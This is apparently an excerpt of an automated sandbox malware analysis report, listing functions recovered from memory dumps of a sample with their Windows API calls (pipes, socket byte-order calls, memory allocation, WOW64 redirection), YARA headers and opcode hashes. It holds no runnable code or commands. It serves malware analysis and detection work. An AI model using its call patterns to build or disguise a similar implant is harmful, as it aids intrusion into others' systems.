                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsWow64Process$kernel32
                            • API String ID: 1646373207-3789238822
                            • Opcode ID: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction ID: b16a82cb7c2139e04b5c2036b1cc79e437b753d75b41075fb1eb96375a7f2ece
                            • Opcode Fuzzy Hash: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction Fuzzy Hash: FDE0EC7474030AFBDF00DBE6DD1AA9D77BCAB4079DF540155B402E2291DBB4DA449730
                            APIs
                            • GetModuleHandleA.KERNEL32(00DE1588,00DE1578,?,?,00DB80DF), ref: 00DB4366
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB436D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsWow64Process$kernel32
                            • API String ID: 1646373207-3789238822
                            • Opcode ID: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction ID: b16a82cb7c2139e04b5c2036b1cc79e437b753d75b41075fb1eb96375a7f2ece
                            • Opcode Fuzzy Hash: 816fa3ad8d5365524cf00bbe74b58302ee03789401e042bed99538d8b8dbf25c
                            • Instruction Fuzzy Hash: FDE0EC7474030AFBDF00DBE6DD1AA9D77BCAB4079DF540155B402E2291DBB4DA449730
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,00DB3465,?), ref: 00DB545D
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB5464
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                            • API String ID: 1646373207-736604160
                            • Opcode ID: 9e8ad9c43bff05399fd74dcd06e414064ae2bc51927056bc65490323afb48f0f
                            • Instruction ID: 48cf562b06b8911942e116e91a01db8996c58910b9029bbed5e83203e33431d9
                            • Opcode Fuzzy Hash: 9e8ad9c43bff05399fd74dcd06e414064ae2bc51927056bc65490323afb48f0f
                            • Instruction Fuzzy Hash: DCC01238381708BB8B002BF2EC099093BACEA84A66B444023B40AC1260CF7185808674
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,00DB3484,?,00000000,00000002), ref: 00DB5482
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB5489
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                            • API String ID: 1646373207-3900151262
                            • Opcode ID: 3a06deaafb9e6fff88f1f1cdb6a08b667fedff7807c50727afe6fde3c4d13312
                            • Instruction ID: fabdd5e205e1fa8ea7b239fb7a7e2ec21c1b3a8b9ecb917a8c7dc16003eaebce
                            • Opcode Fuzzy Hash: 3a06deaafb9e6fff88f1f1cdb6a08b667fedff7807c50727afe6fde3c4d13312
                            • Instruction Fuzzy Hash: F0C08C38381708FF8F003BF7EC0AA093B2CFA81B663444023B40AC1260CF71C4808670
                            APIs
                              • Part of subcall function 00DB8250: htonl.WS2_32(8900DF3A), ref: 00DB8266
                            • GetLastError.KERNEL32(?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DB2036
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                            • _memset.LIBCMT ref: 00DB21A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLastProcess_memsethtonl
                            • String ID:
                            • API String ID: 529797354-0
                            • Opcode ID: 36510c69aab29577729562bc8e987c29ec9aba271a739a827c7b36223c6f7f94
                            • Instruction ID: 5551bd0835241b6133d21f45a56c426bd3291c89af8eac6f9d194f1d95174d9d
                            • Opcode Fuzzy Hash: 36510c69aab29577729562bc8e987c29ec9aba271a739a827c7b36223c6f7f94
                            • Instruction Fuzzy Hash: AEC179B2A10B01DFE720DF69CC81AA673E5FB88304B18893DE587D6651E734E546DB30
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DB2036
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                            • _memset.LIBCMT ref: 00DB21A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLastProcess_memset
                            • String ID:
                            • API String ID: 652633832-0
                            • Opcode ID: 2ebb31ecf83318c086477f3e39be9516fb3890de3afaf3b0a436e576864611f8
                            • Instruction ID: 5551bd0835241b6133d21f45a56c426bd3291c89af8eac6f9d194f1d95174d9d
                            • Opcode Fuzzy Hash: 2ebb31ecf83318c086477f3e39be9516fb3890de3afaf3b0a436e576864611f8
                            • Instruction Fuzzy Hash: AEC179B2A10B01DFE720DF69CC81AA673E5FB88304B18893DE587D6651E734E546DB30
                            APIs
                            • _memset.LIBCMT ref: 00D72080
                            • __snprintf.LIBCMT ref: 00D720A7
                              • Part of subcall function 00D789F6: _memset.LIBCMT ref: 00D78A17
                            • __snprintf.LIBCMT ref: 00D72123
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D752FC
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D75308
                              • Part of subcall function 00D752EC: __snprintf.LIBCMT ref: 00D75359
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D75390
                              • Part of subcall function 00D752EC: _memset.LIBCMT ref: 00D7539B
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D753C6
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D753D2
                              • Part of subcall function 00D753B6: __snprintf.LIBCMT ref: 00D7542E
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D7544C
                              • Part of subcall function 00D753B6: _memset.LIBCMT ref: 00D75457
                            • __snprintf.LIBCMT ref: 00D7213A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf
                            • String ID:
                            • API String ID: 1922369481-0
                            • Opcode ID: ead7a9399f8d34496f40cd949b27a9a8331296bddb999b6bbc598e89ded7c35d
                            • Instruction ID: f5783c8531328dfe1a8ffefc928b194b361c4127caaa9b8e242be62eb6e7924e
                            • Opcode Fuzzy Hash: ead7a9399f8d34496f40cd949b27a9a8331296bddb999b6bbc598e89ded7c35d
                            • Instruction Fuzzy Hash: 02519F72900259BFDB12AFA4DC85DFE7BB8FF05310F148069FA18A7161EB309A458B75
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DC9218: __fsopen.LIBCMT ref: 00DC9225
                            • _fseek.LIBCMT ref: 00DB4D43
                              • Part of subcall function 00DC9852: __lock_file.LIBCMT ref: 00DC9861
                              • Part of subcall function 00DC9852: __ftelli64_nolock.LIBCMT ref: 00DC986E
                            • _fseek.LIBCMT ref: 00DB4D5C
                              • Part of subcall function 00DC9BE3: __lock_file.LIBCMT ref: 00DC9C2E
                              • Part of subcall function 00DC9BE3: __fseek_nolock.LIBCMT ref: 00DC9C3E
                            • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00DB4D89
                            • _malloc.LIBCMT ref: 00DB4DA3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                            • String ID:
                            • API String ID: 73014519-0
                            • Opcode ID: 2ac9803391e3108b8e1a8cdaaff6ddf13b37dd0112536b6c77aca21eac72e4f7
                            • Instruction ID: 3b9c2becabbf478ce625b42fb6ed1a2b757b01b161097e1f9a40c70426ec1af6
                            • Opcode Fuzzy Hash: 2ac9803391e3108b8e1a8cdaaff6ddf13b37dd0112536b6c77aca21eac72e4f7
                            • Instruction Fuzzy Hash: 0B419576800208EACF11BBA4CC86FDEBBBCFF04710F14452AF516A7292EA7595549B74
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DC9218: __fsopen.LIBCMT ref: 00DC9225
                            • _fseek.LIBCMT ref: 00DB4D43
                              • Part of subcall function 00DC9852: __lock_file.LIBCMT ref: 00DC9861
                              • Part of subcall function 00DC9852: __ftelli64_nolock.LIBCMT ref: 00DC986E
                            • _fseek.LIBCMT ref: 00DB4D5C
                              • Part of subcall function 00DC9BE3: __lock_file.LIBCMT ref: 00DC9C2E
                              • Part of subcall function 00DC9BE3: __fseek_nolock.LIBCMT ref: 00DC9C3E
                            • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00DB4D89
                            • _malloc.LIBCMT ref: 00DB4DA3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                            • String ID:
                            • API String ID: 73014519-0
                            • Opcode ID: c3e8423febd3fe34c047ca688e5d44bdcb7f9385b7f33f25835727e774717eee
                            • Instruction ID: 3b9c2becabbf478ce625b42fb6ed1a2b757b01b161097e1f9a40c70426ec1af6
                            • Opcode Fuzzy Hash: c3e8423febd3fe34c047ca688e5d44bdcb7f9385b7f33f25835727e774717eee
                            • Instruction Fuzzy Hash: 0B419576800208EACF11BBA4CC86FDEBBBCFF04710F14452AF516A7292EA7595549B74
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fafee3570bfb1d15ff292a2d921cc4965e0c821b06a38af0948cdc9dafad7173
                            • Instruction ID: 99cb419f186677a8c15d035ed6e42cee133ad7cae13d9ac202bfd31fb049feb8
                            • Opcode Fuzzy Hash: fafee3570bfb1d15ff292a2d921cc4965e0c821b06a38af0948cdc9dafad7173
                            • Instruction Fuzzy Hash: 6D416B72C00509FADF01FBA4DC42DEEBBB9EF44314F14402AF915A2252EB359A55ABB4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af96649240ded465450dd14a8d26e84b7427fd6d4892f02dd22057f6578a939a
                            • Instruction ID: 99cb419f186677a8c15d035ed6e42cee133ad7cae13d9ac202bfd31fb049feb8
                            • Opcode Fuzzy Hash: af96649240ded465450dd14a8d26e84b7427fd6d4892f02dd22057f6578a939a
                            • Instruction Fuzzy Hash: 6D416B72C00509FADF01FBA4DC42DEEBBB9EF44314F14402AF915A2252EB359A55ABB4
                            APIs
                            • __time64.LIBCMT ref: 00DBCC7B
                              • Part of subcall function 00DC9E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DBCB2D,00000000,00000080,?,?,?,00DB13F0,?,00000000,00000000,00000000,00000000), ref: 00DC9E99
                              • Part of subcall function 00DC9E8E: __aulldiv.LIBCMT ref: 00DC9EB9
                            • __time64.LIBCMT ref: 00DBCC96
                            • __time64.LIBCMT ref: 00DBCD26
                            • __time64.LIBCMT ref: 00DBCD8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __time64$Time$FileSystem__aulldiv
                            • String ID:
                            • API String ID: 4218076520-0
                            • Opcode ID: 979b7d82c7253b864d4e79703cfcf7af156ffc855b533e30c36816fd51ffd29f
                            • Instruction ID: 4bc6fab59af33bca0b1863b0636809a6ab3cee5136dddb79eeabc11b9f95f85b
                            • Opcode Fuzzy Hash: 979b7d82c7253b864d4e79703cfcf7af156ffc855b533e30c36816fd51ffd29f
                            • Instruction Fuzzy Hash: 904126B8910384CFC724EFA9E9C25A5BBE4FBA5350724923ED05ACB3A1D3709944DB70
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __time64$__aulldiv
                            • String ID:
                            • API String ID: 2203630334-0
                            • Opcode ID: 4bdce021f664fb6a8a2a07c26b2a73003d50b7fd43c405f525bd81e189684942
                            • Instruction ID: 9a86604d8792b840932bdbb2b9a5aa746ed2c47b0e9c0e83698e452ccb807288
                            • Opcode Fuzzy Hash: 4bdce021f664fb6a8a2a07c26b2a73003d50b7fd43c405f525bd81e189684942
                            • Instruction Fuzzy Hash: 12415A75810710CFE32ADF69CEC2526B7E0FB8A310794D13EE89DCA262E7B05840DB60
                            APIs
                            • _memset.LIBCMT ref: 00DB731D
                            • _memset.LIBCMT ref: 00DB7335
                              • Part of subcall function 00DB8293: htons.WS2_32(?), ref: 00DB82AB
                              • Part of subcall function 00DB7260: GetLastError.KERNEL32(-0000EA60,00000000,?,00DB37B2,?), ref: 00DB727A
                            • Sleep.KERNEL32(000001F4), ref: 00DB73C8
                            • GetLastError.KERNEL32 ref: 00DB73D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_memset$Sleephtons
                            • String ID:
                            • API String ID: 2264653377-0
                            • Opcode ID: 963605eb3a14d657a7d69fca771bcbdd6b63a556e28c08e39e32860723418bfa
                            • Instruction ID: f206063e2d8443a4cbf573a79659aa6c6863925320ec65c2579ae98126b60717
                            • Opcode Fuzzy Hash: 963605eb3a14d657a7d69fca771bcbdd6b63a556e28c08e39e32860723418bfa
                            • Instruction Fuzzy Hash: E931607690431DAEDF11AAE4DC82EEE77BCEF44354F04006AF616A6281EA359A089774
                            APIs
                            • _memset.LIBCMT ref: 00DB731D
                            • _memset.LIBCMT ref: 00DB7335
                              • Part of subcall function 00DB7260: GetLastError.KERNEL32(-0000EA60,00000000,?,00DB37B2,?), ref: 00DB727A
                            • Sleep.KERNEL32(000001F4), ref: 00DB73C8
                            • GetLastError.KERNEL32 ref: 00DB73D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_memset$Sleep
                            • String ID:
                            • API String ID: 4288913296-0
                            • Opcode ID: ed3829cd5923d5acf06ec9733b03637165b91a318efad220b3f57f430e8f0cf7
                            • Instruction ID: f206063e2d8443a4cbf573a79659aa6c6863925320ec65c2579ae98126b60717
                            • Opcode Fuzzy Hash: ed3829cd5923d5acf06ec9733b03637165b91a318efad220b3f57f430e8f0cf7
                            • Instruction Fuzzy Hash: E931607690431DAEDF11AAE4DC82EEE77BCEF44354F04006AF616A6281EA359A089774
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DD390C
                            • __isleadbyte_l.LIBCMT ref: 00DD3940
                            • MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,53DC458D,00DE15C0,00000000,?,?,?,00DBC08B,00000000,00DE15C0,00000000), ref: 00DD3971
                            • MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,00000001,00DE15C0,00000000,?,?,?,00DBC08B,00000000,00DE15C0,00000000), ref: 00DD39DF
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 716244ab207ba0279e284591128ac0609098a4792c8eeb8f40b8513e5ef6d592
                            • Instruction ID: 2890352efec7c56df083a6ad7b4cec4dbe27fc690dc3e4bd3de3b65bc53b347b
                            • Opcode Fuzzy Hash: 716244ab207ba0279e284591128ac0609098a4792c8eeb8f40b8513e5ef6d592
                            • Instruction Fuzzy Hash: 3631A23190424AEFDB20DF64C8A5AAD7BA5FF01311F19456AE4A19B391D370DE40DF72
                            APIs
                            • _memset.LIBCMT ref: 00DB6C39
                            • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 00DB6C52
                            • SetLastError.KERNEL32(00000005,?,?,00000000), ref: 00DB6C77
                              • Part of subcall function 00DBD320: GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DBD369
                              • Part of subcall function 00DBD320: VirtualAlloc.KERNEL32(00000000,00DB2023,00003000,00000000,000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080), ref: 00DBD3CA
                            • SetLastError.KERNEL32(00000006,?,?,00000000), ref: 00DB6CF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$AllocCurrentProcessVersionVirtual_memset
                            • String ID:
                            • API String ID: 3952774693-0
                            • Opcode ID: 7da21adc663d3d706e8a67ff40aa4270fbfd502f96806dafcefe7669d246c1d8
                            • Instruction ID: 0a657f9c836f473a110d9c807e17d044dd27879e9c6755598ee909798266ba5c
                            • Opcode Fuzzy Hash: 7da21adc663d3d706e8a67ff40aa4270fbfd502f96806dafcefe7669d246c1d8
                            • Instruction Fuzzy Hash: 2121F732A00314EFD7309E749C42BDB7BE4EB05724F150025E94FA7282EA74D9498BB0
                            APIs
                            • _memset.LIBCMT ref: 00DB6C39
                            • GetVersionExA.KERNEL32(?), ref: 00DB6C52
                            • SetLastError.KERNEL32(00000005), ref: 00DB6C77
                              • Part of subcall function 00DBD320: GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DBD369
                              • Part of subcall function 00DBD320: VirtualAlloc.KERNEL32(00000000,00DB2023,00003000,00000000,000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080), ref: 00DBD3CA
                            • SetLastError.KERNEL32(00000006), ref: 00DB6CF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$AllocCurrentProcessVersionVirtual_memset
                            • String ID:
                            • API String ID: 3952774693-0
                            • Opcode ID: 56e831b719296b6a3aa2dd107392d8ed7a09a6dd2e82f7451b8ea8c783cb5076
                            • Instruction ID: 0a657f9c836f473a110d9c807e17d044dd27879e9c6755598ee909798266ba5c
                            • Opcode Fuzzy Hash: 56e831b719296b6a3aa2dd107392d8ed7a09a6dd2e82f7451b8ea8c783cb5076
                            • Instruction Fuzzy Hash: 2121F732A00314EFD7309E749C42BDB7BE4EB05724F150025E94FA7282EA74D9498BB0
                            APIs
                            • _malloc.LIBCMT ref: 00DB7033
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB7048
                              • Part of subcall function 00DB7162: PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000080), ref: 00DB7183
                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000080), ref: 00DB70AF
                            • _memset.LIBCMT ref: 00DB70E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapNamedObjectPeekPipeSingleWait_malloc_memsethtonl
                            • String ID:
                            • API String ID: 2241902265-0
                            • Opcode ID: b06e1e6090bec903adcce3fe0327fd55a923c88934fab92d3d5b51a4925cb0cb
                            • Instruction ID: 7eda7c9c13baa64cdf41f0c3949c292c0bdb97d06f0825f743b65ae6dd36fd79
                            • Opcode Fuzzy Hash: b06e1e6090bec903adcce3fe0327fd55a923c88934fab92d3d5b51a4925cb0cb
                            • Instruction Fuzzy Hash: 2221C471904201EBDF20BFA99881AEE77B4FF84760F654156FC45AB282EB70CD418775
                            APIs
                            • _malloc.LIBCMT ref: 00DB7033
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB7048
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000080), ref: 00DB70AF
                            • _memset.LIBCMT ref: 00DB70E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapObjectSingleWait_malloc_memsethtonl
                            • String ID:
                            • API String ID: 3856049160-0
                            • Opcode ID: a9d644d3dc2f5fc706d93fc4146e9f5c02e290d5b4b0abc63994e00a45415a0e
                            • Instruction ID: 7eda7c9c13baa64cdf41f0c3949c292c0bdb97d06f0825f743b65ae6dd36fd79
                            • Opcode Fuzzy Hash: a9d644d3dc2f5fc706d93fc4146e9f5c02e290d5b4b0abc63994e00a45415a0e
                            • Instruction Fuzzy Hash: 2221C471904201EBDF20BFA99881AEE77B4FF84760F654156FC45AB282EB70CD418775
                            APIs
                            • _memset.LIBCMT ref: 00DB32FF
                            • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00DB3335
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB333F
                            • WaitForSingleObject.KERNEL32(?,00002710), ref: 00DB3383
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                            • String ID:
                            • API String ID: 468459245-0
                            • Opcode ID: a9f3adcc7b861c043d03ba3a9e601a8231580c7dddd69f40ceceb267d2e173b4
                            • Instruction ID: 79d2c6659b41965294aae56917dc146933c58c7ab724a46bbefdbb8f61c7e47f
                            • Opcode Fuzzy Hash: a9f3adcc7b861c043d03ba3a9e601a8231580c7dddd69f40ceceb267d2e173b4
                            • Instruction Fuzzy Hash: 0A212572C00218FEDB10DFA8DD45ADEBBB9FF48310F100116FA05E6251E7719A058BA1
                            APIs
                            • _memset.LIBCMT ref: 00DB32FF
                            • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00DB3335
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB333F
                            • WaitForSingleObject.KERNEL32(?,00002710), ref: 00DB3383
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                            • String ID:
                            • API String ID: 468459245-0
                            • Opcode ID: a5e0a75f24bddbb3a05318d075c0f4a2862b454543c642f9ea8646a79b39ba0c
                            • Instruction ID: 79d2c6659b41965294aae56917dc146933c58c7ab724a46bbefdbb8f61c7e47f
                            • Opcode Fuzzy Hash: a5e0a75f24bddbb3a05318d075c0f4a2862b454543c642f9ea8646a79b39ba0c
                            • Instruction Fuzzy Hash: 0A212572C00218FEDB10DFA8DD45ADEBBB9FF48310F100116FA05E6251E7719A058BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                            • String ID:
                            • API String ID: 2856252058-0
                            • Opcode ID: eccc273c426231604760ca4403401cd5331d21854103d622b5c33626475fdbcf
                            • Instruction ID: 89add50b5b65483f55346bf734faf97b606bbc22bebd71fe6c1ee5d543c136ec
                            • Opcode Fuzzy Hash: eccc273c426231604760ca4403401cd5331d21854103d622b5c33626475fdbcf
